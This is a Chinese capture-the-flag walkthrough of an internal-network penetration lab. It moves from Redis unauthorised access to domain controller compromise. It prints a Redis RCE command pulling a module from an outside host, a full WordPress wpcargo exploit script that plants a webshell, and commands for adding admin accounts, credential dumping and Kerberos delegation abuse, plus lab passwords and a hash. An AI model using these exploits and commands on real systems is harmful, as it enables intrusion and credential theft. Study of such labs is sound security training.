春秋云镜-Brute4Road - WP

内网渗透
111

fscan开扫

39.99.234.177:6379 open
39.99.234.177:21 open
39.99.234.177:22 open
39.99.234.177:80 open

6379端口 redis未授权访问

打主从复制rce

python3 redis-rce.py -r 39.99.234.177 -p 6379 -L 42.192.42.48 -P 2333 -f exp.so

image-20231010125849314

suid提权

看到一个base64

base64 "flag01" | base64 --decode

得到第一个flag

image-20231010125957157

尝试ifconfig 看不了网段

上传cdk

image-20231010140141440

fscan开扫

172.22.2.3 DC.xiaorang.lab  Windows Server 2016 Datacenter 14393
172.22.2.7(已经拿下)
172.22.2.16  MSSQLSERVER.xiaorang.lab
172.22.2.18  WORKGROUP\UBUNTU-WEB02 Wordpress
172.22.2.34  CLIENT01
172.22.2.18  WORKGROUP\UBUNTU-WEB02 Wordpress
172.22.2.34  CLIENT01

开个frp访问172.22.2.18的wordpress

image-20231010140923491

wpscan开扫

image-20231010141050995

扫出wpcargo插件,存在pre-auth RCE

https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a

import sys
import binascii
import requests
# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'
def encode_character_code(c: int):
    return '{:08b}'.format(c).replace('0', 'x')
text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]
destination_url = 'http://127.0.0.1:8001/'
cmd = 'ls'
# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
requests.get(
    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)
# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
    f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))

image-20231010141506888

蚁剑连接

读取wp-config.php

image-20231010142012643

得到数据库用户名密码为wpuserWpuserEha8Fgj9

数据库蚁剑连接报错了

传个adminer上去

image-20231010142520076

得到第二个flag

i

另一个表得到了一堆密码

拿fscan爆172.22.2.16 的MSSQL

nohup ./fscan_amd64 -h 172.22.2.16 -m mssql -pwdf pass.txt 2>&1 >nohup.out 2>/dev/null

image-20231010143322160

proxychains4 运行 Multiple 报错了

m芯片老是遇到一些奇奇怪怪的问题qwq

image-20231010230207597

那就把他的端口转发出来然后就可以不用proxychains

[mssql] type = tcplocal_ip = 172.22.2.16
local_port = 1433
remote_port = 6433

image-20231010150230148

image-20231010152154056

拿到第三个flag

sweetpotato提权上线viper

image-20231010172850450

存在域用户XIAORANG\Willam的进程

load kiwicreds_all

导出凭证

image-20231010171759125

得到XIAORANG.lab\\William 的明文密码为Willg1UoO6Jt

但是密码貌似过期了 登不上

这台机器开放了3389端口 新建个用户

C:\temp\sweetpotato.exe -a "net user xuxfff P@ssw0rd /add"C:\temp\sweetpotato.exe -a "net localgroup administrators xuxfff /add"

然后rdp上去

拿到了MSSQLSERVER这台机器的机器账户 尝试打约束委派

image-20231010175518400

不知道为什么死活用不了Rubeus = = (估计是.NET版本的问题)

转战keko

先申请TGT,再拿TGT申请ST

tgt::ask /user:MSSQLSERVER$ /domain:xiaorang.lab /rc4:d504224b0664ab93b16c08afecc9f47f​tgs::s4u /tgt:TGT_MSSQLSERVER$@XIAORANG.LAB_krbtgt~xiaorang.lab@XIAORANG.LAB.kirbi /user:Administrator@xiaorang.lab /service:cifs/DC.xiaorang.lab

然后mimikatz加载票据ptt

kerberos::ptt TGS_Administrator@xiaorang.lab@XIAORANG.LAB_cifs~DC.xiaorang.lab@XIAORANG.LAB.kirbi

image-20231010183643652